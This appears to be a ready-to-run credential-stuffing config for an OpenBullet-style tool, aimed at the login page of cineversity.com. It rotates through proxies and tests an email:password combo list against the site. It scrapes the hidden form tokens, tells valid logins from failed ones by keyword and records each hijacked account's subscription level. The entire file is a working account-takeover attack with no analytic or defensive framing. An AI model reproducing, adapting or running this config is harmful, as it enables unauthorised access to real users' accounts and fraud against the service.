[SETTINGS]
{
  "Name": "Cine",
  "SuggestedBots": 15,
  "LastModified": "2018-06-25T14:21:02.5900482+00:00",
  "AdditionalInfo": "",
  "Author": "v0ilawes",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 4,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST GET "https://www.cineversity.com/user/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_XID PARSE "<SOURCE>" CSS "[name=XID]" "value" 0 -> VAR "XID" "" "" 
#PARSE_ACT PARSE "<SOURCE>" CSS "[name=ACT]" "value" 0 -> VAR "ACT" "" "" 
#PARSE_RET PARSE "<SOURCE>" CSS "[name=RET]" "value" 0 -> VAR "RET" "" "" 
#PARSE_SITE_ID PARSE "<SOURCE>" CSS "[name=site_id]" "value" 0 -> VAR "SITE_ID" "" "" 
#PARSE_AUTO_LOGIN PARSE "<SOURCE>" CSS "[name=auto_login]" "value" 0 -> VAR "AUTO_LOGIN" "" "" 
#POST_LOGIN REQUEST POST " https://www.cineversity.com/user/login" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&XID=<XID>&ACT=<ACT>&RET=<RET>&site_id=<SITE_ID>&auto_login=<AUTO_LOGIN>&submit=Submit" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.cineversity.com/" 
  HEADER "Origin: https://www.cineversity.com" 
  HEADER "Upgrade-Insecure-Requests: 1" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Error" 
    KEY "Login" 
  KEYCHAIN Success OR 
    KEY "Log Out" 
#REQUEST_DETAILS REQUEST GET "https://www.cineversity.com/user/subscription_history" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_ACC_LEVEL PARSE "<SOURCE>" LR "<div>Account Level:  <span>" "<" Recursive=FALSE -> CAP "ACCOUNT LEVEL" "" "" 
